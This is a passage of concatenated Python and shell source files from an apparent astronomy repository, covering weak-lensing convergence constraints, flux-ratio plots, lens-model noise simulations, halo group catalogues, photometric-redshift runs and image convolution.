kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) 
+ E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in 
Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nnp.savetxt(output,unbiased_kappa_constrained,fmt='%s',delimiter='\\t',newline='\\n')\nnp.savetxt(outputLOS,np.array([LOS]),fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5418655276298523, "alphanum_fraction": 0.5904555320739746, "avg_line_length": 27.8125, "blob_id": "c48506ecba5c2556bfdf73eb32887d1db905854e", "content_id": "6f485eee6534a40e3f68a6aa5314f4720bf5c90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2305, "license_type": "no_license", "max_line_length": 246, "num_lines": 80, "path": "/python/plot_utilities/fluxratiocomplete.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple plot with custom labels\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.clf()\n\nSIS_b = 1.54\nSIS_c = 1.46\nSIS_d = 0.52\nSIS_bc = 1.05\nSIS_db = 0.34\nSIS_dc = 0.36\n\nSIE_b = 1.47\nSIE_c = 1.39\nSIE_d = 0.58\nSIE_bc = 1.06\nSIE_db = 0.39\nSIE_dc = 0.41\n\nG2_b = 2.06\nG2_c = 1.94\nG2_d = 0.96\nG2_bc = 1.06\nG2_db = 0.46\nG2_dc = 0.49\n\ndata = np.loadtxt('fluxratioerr.cat', dtype={'names': ('filter', 'B/A', 'B/Ae', 'C/A', 'C/Ae', 'D/A', 'D/Ae', 'B/C', 'B/Ce', 'D/B', 'D/Be', 'D/C', 'D/Ce'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [x[1] for x in data]\nb_e = [x[2] for x in data]\nc = [x[3] for x in 
data]\nc_e = [x[4] for x in data]\nd = [x[5] for x in data]\nd_e = [x[6] for x in data]\nbc = [x[7] for x in data]\nbc_e = [x[8] for x in data]\nbd = [x[9] for x in data]\nbd_e = [x[10] for x in data]\ncd = [x[11] for x in data]\ncd_e = [x[12] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1], color='b')\nplt.errorbar(x, b, yerr=b_e, color='b')\nplt.plot(x, x*0+SIS_b, color='b', linestyle='--')\n#plt.plot(x, x*0+SIE_b, color='b', linestyle=':')\n\nplt.plot(x, c, label=data.dtype.names[3], color='g')\nplt.errorbar(x, c, yerr=c_e, color='g')\nplt.plot(x, x*0+SIS_c, color='g', linestyle='--')\n#plt.plot(x, x*0+SIE_c, color='g', linestyle=':')\n\nplt.plot(x, d, label=data.dtype.names[5], color='r')\nplt.errorbar(x, d, yerr=d_e, color='r')\nplt.plot(x, x*0+SIS_d, color='r', linestyle='--')\n#plt.plot(x, x*0+SIE_d, color='r', linestyle=':')\n\nplt.plot(x, bc, label=data.dtype.names[7], color='m')\nplt.errorbar(x, bc, yerr=bc_e, color='m')\nplt.plot(x, x*0+SIS_bc, color='m', linestyle='--')\n#plt.plot(x, x*0+SIE_bc, color='m', linestyle=':')\n\nplt.plot(x, bd, label=data.dtype.names[9], color='c')\nplt.errorbar(x, bd, yerr=bd_e, color='c')\nplt.plot(x, x*0+SIS_db, color='c', linestyle='--')\n#plt.plot(x, x*0+SIE_db, color='c', linestyle=':')\n\nplt.plot(x, cd, label=data.dtype.names[11], color='y')\nplt.errorbar(x, cd, yerr=cd_e, color='y')\nplt.plot(x, x*0+SIS_dc, color='y', linestyle='--')\n#plt.plot(x, x*0+SIE_dc, color='y', linestyle=':')\n\nplt.xlabel('Filter')\nplt.ylabel('Flux ratio')\nplt.legend()\n\nplt.savefig('fluxratioinversecomplete.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5163464546203613, "alphanum_fraction": 0.5906639695167542, "avg_line_length": 41.925926208496094, "blob_id": "7ea4284a9cd25e3211009b4cb16197651f5c17e4", "content_id": "39b7506c5c92eeeadfb6d64f5aa91709d22f333c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5934, "license_type": "no_license", "max_line_length": 185, "num_lines": 135, "path": "/python/modeling_utilities/simulate.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given an image containing flux from a perfect model, as well as a value for the original (unsubtracted) sky, create an image containing pure Poisson noise, with null sky level\r\n# Careful, the code needs to be updated for each particular input file\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport corner\r\n\r\nexptime = 1440 # exposure time\r\nsim = 100 # number of simulations\r\nmodel = \"ilens_out_model.fits\"\r\nsky = 40000 # in case I compute this from the std of sky pixels, I need to do it on the subtracted best-fit image\r\nfile = \"ilens_out_file_simulated.input\"\r\n\r\nfor i in range(sim):# sim\r\n \r\n # simulate noisy image\r\n image = fits.open(model)\r\n data = image[0].data\r\n data = data + sky\r\n noise = np.random.poisson(data)\r\n noise = noise - sky\r\n image[0].data = noise.astype(\"float32\") # Hostlens expects this\r\n image.writeto(model[:-5]+\"_noise.fits\",clobber=True)\r\n \r\n # redirect the output\r\n with open(file, 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[5 - 1] = \"prefix %s\" % file[:-6] + str(i+1) + \"\\n\"\r\n if i == 0:\r\n hostlens[24 - 1] = \"dump_subtract 1 \\n\"\r\n else:\r\n hostlens[24 - 1] = \"dump_subtract 0 \\n\"\r\n if i == sim - 1:\r\n pixscale = float(hostlens[6 - 1].split()[1])\r\n # update these:\r\n init1 = 
float(hostlens[43 - 1].split()[1]) * pixscale\r\n init2 = float(hostlens[44 - 1].split()[1]) * pixscale\r\n init3 = 25 - 2.5*np.log10(float(hostlens[50 - 1].split()[1])/exptime)\r\n init4 = float(hostlens[54 - 1].split()[1]) * pixscale\r\n init5 = float(hostlens[55 - 1].split()[1]) * pixscale\r\n init6 = 25 - 2.5*np.log10(float(hostlens[61 - 1].split()[1])/exptime)\r\n init7 = float(hostlens[65 - 1].split()[1]) * pixscale\r\n init8 = float(hostlens[66 - 1].split()[1]) * pixscale\r\n init9 = 25 - 2.5*np.log10(float(hostlens[72 - 1].split()[1])/exptime)\r\n init10 = float(hostlens[76 - 1].split()[1]) * pixscale\r\n init11 = float(hostlens[77 - 1].split()[1]) * pixscale\r\n init12 = 25 - 2.5*np.log10(float(hostlens[83 - 1].split()[1])/exptime)\r\n init13 = float(hostlens[87 - 1].split()[1]) * pixscale\r\n init14 = float(hostlens[88 - 1].split()[1]) * pixscale\r\n init15 = 25 - 2.5*np.log10(float(hostlens[89 - 1].split()[1])/exptime)\r\n with open(file, 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n\r\n os.system(\"hostlens %s\" % file)\r\n\r\n# update number of parameters according to input\r\npar1 = np.zeros(sim)\r\npar2 = np.zeros(sim)\r\npar3 = np.zeros(sim)\r\npar4 = np.zeros(sim)\r\npar5 = np.zeros(sim)\r\npar6 = np.zeros(sim)\r\npar7 = np.zeros(sim)\r\npar8 = np.zeros(sim)\r\npar9 = np.zeros(sim)\r\npar10 = np.zeros(sim)\r\npar11 = np.zeros(sim)\r\npar12 = np.zeros(sim)\r\npar13 = np.zeros(sim)\r\npar14 = np.zeros(sim)\r\npar15 = np.zeros(sim)\r\n\r\nfor i in range(sim):\r\n with open(file[:-6] + str(i+1) + \"_optresult.dat\", 'r') as f:\r\n hostlens = f.readlines()\r\n # update these:\r\n par1[i] = float(hostlens[0 - 7].split()[1]) * pixscale # -7 if there are 5 objects of interest\r\n par2[i] = float(hostlens[0 - 7].split()[2]) * pixscale\r\n par3[i] = 25 - 2.5*np.log10(float(hostlens[0 - 7].split()[8])/exptime)\r\n par4[i] = float(hostlens[0 - 6].split()[1]) * pixscale\r\n par5[i] = float(hostlens[0 - 6].split()[2]) * pixscale\r\n par6[i] = 25 - 2.5*np.log10(float(hostlens[0 - 6].split()[8])/exptime)\r\n par7[i] = float(hostlens[0 - 5].split()[1]) * pixscale\r\n par8[i] = float(hostlens[0 - 5].split()[2]) * pixscale\r\n par9[i] = 25 - 2.5*np.log10(float(hostlens[0 - 5].split()[8])/exptime)\r\n par10[i] = float(hostlens[0 - 4].split()[1]) * pixscale\r\n par11[i] = float(hostlens[0 - 4].split()[2]) * pixscale\r\n par12[i] = 25 - 2.5*np.log10(float(hostlens[0 - 4].split()[8])/exptime)\r\n par13[i] = float(hostlens[0 - 3].split()[1]) * pixscale\r\n par14[i] = float(hostlens[0 - 3].split()[2]) * pixscale\r\n par15[i] = 25 - 2.5*np.log10(float(hostlens[0 - 3].split()[3])/exptime)\r\n #os.system(\"rm %s\" % (file[:-6] + str(i+1) + \"_optresult.dat\"))\r\n\r\n# update these:\r\nstd1 = np.sqrt(np.sum((par1 - init1)**2)/(sim - 1))\r\nstd2 = np.sqrt(np.sum((par2 - init2)**2)/(sim - 1))\r\nstd3 = np.sqrt(np.sum((par3 - init3)**2)/(sim - 1))\r\nstd4 = np.sqrt(np.sum((par4 - init4)**2)/(sim - 1))\r\nstd5 = np.sqrt(np.sum((par5 - init5)**2)/(sim - 1))\r\nstd6 = np.sqrt(np.sum((par6 - init6)**2)/(sim - 1))\r\nstd7 = np.sqrt(np.sum((par7 - init7)**2)/(sim - 1))\r\nstd8 = np.sqrt(np.sum((par8 - init8)**2)/(sim - 1))\r\nstd9 = np.sqrt(np.sum((par9 - init9)**2)/(sim - 1))\r\nstd10 = np.sqrt(np.sum((par10 - init10)**2)/(sim - 1))\r\nstd11 = np.sqrt(np.sum((par11 - init11)**2)/(sim - 1))\r\nstd12 = np.sqrt(np.sum((par12 - init12)**2)/(sim - 1))\r\nstd13 = np.sqrt(np.sum((par13 - init13)**2)/(sim - 1))\r\nstd14 = np.sqrt(np.sum((par14 - init14)**2)/(sim - 1))\r\nstd15 = np.sqrt(np.sum((par15 - 
init15)**2)/(sim - 1))\r\n\r\n# update these:\r\nprint \"std 1: \", std1, \" [arcsec]\"\r\nprint \"std 2: \", std2, \" [arcsec]\"\r\nprint \"std 3: \", std3, \" [dmag]\"\r\nprint \"std 4: \", std4, \" [arcsec]\"\r\nprint \"std 5: \", std5, \" [arcsec]\"\r\nprint \"std 6: \", std6, \" [dmag]\"\r\nprint \"std 7: \", std7, \" [arcsec]\"\r\nprint \"std 8: \", std8, \" [arcsec]\"\r\nprint \"std 9: \", std9, \" [dmag]\"\r\nprint \"std 10: \", std10, \" [arcsec]\"\r\nprint \"std 11: \", std11, \" [arcsec]\"\r\nprint \"std 12: \", std12, \" [dmag]\"\r\nprint \"std 13: \", std13, \" [arcsec]\"\r\nprint \"std 14: \", std14, \" [arcsec]\"\r\nprint \"std 15: \", std15, \" [dmag]\"\r\n\r\n# update the length:\r\n#data = np.c_[par1,par2,par3,par4,par5,par6,par7,par8,par9,par10,par11,par12,par13,par14,par15]\r\n#figure = corner.corner(data, labels=np.linspace(1,np.shape(data)[0],np.shape(data)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\n#figure.savefig(file[:-6] + \"_simulations.png\", dpi=100)\r\n# ignore any WARNING:root:Too few points to create valid contours\r\n\r\n\r\n" }, { "alpha_fraction": 0.587837815284729, "alphanum_fraction": 0.633357048034668, "avg_line_length": 47.465518951416016, "blob_id": "7db1a8a4abe6f7720812483637fea96ee550820c", "content_id": "bfd90da5ab7c5d39bed3ff8779d7b9037dcfcd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 192, "num_lines": 58, "path": "/python/catalogue_utilities/MSgroups.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport os\nfrom stellarpop import distances\n\nmingroup = 5 # I would normally use minimum number of members of any group spectroscopically identified by Dominique in the real data, but that is problematic due to different sigma_8\nmingrouplimmag = 5\nmagmingroup = 25.5\nh = 0.73 # MS\nomegaL = 0.75\nomega0 = 0.25\nzs = 1.662\nzl = 0.661\nthetaL = 0.95 # COSMOGRAIL VII\ndist = distances.Distance()\ndist.OMEGA_M = omega0\ndist.OMEGA_L = omegaL\ndist.h = h\ndef fbeta(z,zs,zl,dist):\n    beta = (dist.angular_diameter_distance(zl, z) * dist.angular_diameter_distance(zs)) / (dist.angular_diameter_distance(z) * dist.angular_diameter_distance(zl, zs))\n    if z > zl: return (1-beta)**2\n    else: return 1\n# indices\nhalo = 0\nspecz = 1\nposx = 2\nposy = 3\nmhalo = 4\nimag = 5\n\nos.system('rm -f /Users/cerusu/Dropbox/Davis_work/code/WFI2033/8_0_0groups.cat')\nf = open(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/8_0_0groups.cat\", \"a\")\nroot = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nlst = [x for x in os.listdir(root) if (('GGL_los_8_0_0' in x) and ('_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt' in x))]\n#print lst[0]\nnr = 0\nfor j in range(len(lst)):\n    print j+1,'/',16\n    cat = np.loadtxt(root+lst[j],usecols=[1,5,6,7,9,15],comments='GalID')\n    catobs = cat[cat[:,imag] <= magmingroup]\n    haloID = np.unique(catobs[:,halo],return_counts=True)\n    groupID = haloID[0][np.where(haloID[1] >= mingrouplimmag)]\n    if j == 0: f.write(\"# nr galcount posx posy logMhalo specz veldisp thetaE radius \\n\")\n    for i in range(len(groupID)):\n        if len(cat[:,halo][cat[:,halo] == groupID[i]]) > mingroup:\n            nr += 1\n            mhalogroup = np.max(cat[:,mhalo][cat[:,halo] == groupID[i]])\n            speczhalo = np.mean(cat[:,specz][cat[:,halo] == groupID[i]])\n            sigma = (np.sqrt(omegaL + omega0 * (1+speczhalo)**3) * (mhalogroup/h) / 
1200000) ** (1.0/3) # eq. 10 from Finn et al. 2005\n posxgroup = np.mean(cat[:,posx][cat[:,halo] == groupID[i]])\n posygroup = np.mean(cat[:,posy][cat[:,halo] == groupID[i]])\n Dgs = dist.angular_diameter_distance(speczhalo, zs)\n Ds = dist.angular_diameter_distance(zs)\n thetaE = Dgs/Ds * 30 * (sigma/1000) ** 2 # https://ned.ipac.caltech.edu/level5/Mellier/Mellier2_3.html in arcsec\n radius = (((thetaE * thetaL) ** 2) * fbeta(speczhalo,zs,zl,dist)/0.0001) ** (1.0/3) # arcsec\n str = '%d %d %.8f %.8f %.2f %.4f %.2f %.2f %.2f \\n' %(nr, len(cat[:,halo][cat[:,halo] == groupID[i]]), posxgroup, posygroup, np.log10(mhalogroup), speczhalo, sigma, thetaE, radius)\n #print nr, len(cat[:,halo][cat[:,halo] == groupID[i]]), posxgroup, posygroup, np.log10(mhalogroup), speczhalo, sigma, thetaE, radius\n f.write(str)\nf.close()\n" }, { "alpha_fraction": 0.6765799522399902, "alphanum_fraction": 0.7038413882255554, "avg_line_length": 23.393939971923828, "blob_id": "ff390beb1c9e08e206359239f3c819580bae0042", "content_id": "b2bc5cf6b3f3ca0380eacf8bad2d7a9d4ca132c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 807, "license_type": "no_license", "max_line_length": 139, "num_lines": 33, "path": "/python/config_utilities/runlephare_phys_para_CFHTLS.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#! /bin/sh\n#Script to run lephare\n#usage: runlephare.sh file\n\nLEPHAREDIR=$HOME/lephare_dev\nPARA=$HOME/lephare_dev/config/lephare_CFHTLenS.para\n\nLEPHAREWORK=$HOME/lephare_dev/work\n\nexport LEPHAREDIR\nexport LEPHAREWORK\n\nLIBR=MAG_BC03_I09\n\nFILEIN=$1\nFILEOUT=${FILEIN%.lepharein}.${LIBR}.lephareout\n\n#Select the correct options depending on \n#the \"i\" band. i:old one(4th filter), y:new one(5th filter).\nif [[ \"${FILEIN}\" =~ \"izrgu\" ]]\nthen\n OPTIONS=\"-NZ_PRIOR 4,2,4 -MAG_REF 4 -MABS_REF 4 -ZMAX_FILT 4\"\nfi\nif [[ \"${FILEIN}\" =~ \"yzrgu\" ]]\nthen\n OPTIONS=\"-NZ_PRIOR 5,2,5 -MAG_REF 5 -MABS_REF 5 -ZMAX_FILT 5\"\nfi\n\necho \"Computing physical parameters\"\n\nrm -f $FILEOUT\n\n$LEPHAREDIR/source/zphota -c $PARA $OPTIONS -CAT_IN $FILEIN -CAT_OUT $FILEOUT -ZPHOTLIB $LIBR,MAG_STAR,MAG_QSO -ZFIX yes -ZMAX_MAGLIM 24.0\n\n\n" }, { "alpha_fraction": 0.7406049370765686, "alphanum_fraction": 0.7589367628097534, "avg_line_length": 40.94230651855469, "blob_id": "6a007eb2e7bc6b41c13901dbc680e9446fc5f141", "content_id": "bcbb1d2e0127b54fbfe4b85f22d4046547190c85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2182, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/python/image_utilities/convolution.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Code to convolve an image with a kernel, such as produced by py_mk-kernels.py\n\nfrom astropy.io import fits\nfrom scipy import signal\n\nim=fits.open(\"FINALweighted_u_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-u_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_u_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_r_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-r_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_r_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_i_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-i_hybrid.fits\")\nconv 
= signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_i_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_z_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-z_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_z_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_Y_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-Y_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_Y_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_J_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-J_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_J_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_H_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-H_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_H_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_Ks_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-Ks_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_Ks_covernolens_matchg.fits', clobber=0)\n\n" }, { "alpha_fraction": 0.46751824021339417, "alphanum_fraction": 0.5481751561164856, "avg_line_length": 57.12765884399414, "blob_id": "2274ecf291fdebd55acefd438f6923b87c0eebd2", "content_id": "3b7db2b6e2956c104d457a575dc49a9ac463cf2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2740, "license_type": "no_license", "max_line_length": 255, "num_lines": 47, "path": "/python/modeling_utilities/mcmc_einstmagniftimesrc.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Uses an existing glafic MCMC chain to plot corresponding distributions for the Einstein radius, time delays and magnifications\n# run in a fresh terminal, because I need to save the terminal output to disk\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfile = \"pointSIEgamma.input\"\nfileout = \"out_SIEgammafield_einstmagniftime_point.dat\"\nchains = 10\r\nlength = 10000\nz_s = 2.517\nimg = 4\n\nfor i in range(chains):\n    mcmc = np.loadtxt(file[:-6] + str(i+1) + \"_mcmc.dat\",unpack=True)\n    mcmci = mcmc[1:,int(np.shape(mcmc)[1]/4):np.shape(mcmc)[1]] # eliminate the first column, containing chi^2, as well as the first 25% of the chains\n    if i == 0: mcmcfinal = mcmci\n    else: mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\nmcmclength = np.shape(mcmcfinal)[1]\ninterval = mcmclength / length\n\nfor i in range(length):\n    if interval * i < mcmclength:\n        print 'step', i+1\n        os.system(\"cp %s %s\" % (file,file[:-6] + \"_einstmagniftime.input\"))\n        with open(file[:-6] + \"_einstmagniftime.input\", 'r') as f:\n            glafic = f.readlines()\n        glafic[10 - 1] = \"prefix %s \\n\" % (fileout[:-10])\n        glafic[28 - 1] = \"lens sie %s %s %s %s %s 0.000000e+00 0.000000e+00 \\n\" % (mcmcfinal[:,interval * i][0],mcmcfinal[:,interval * 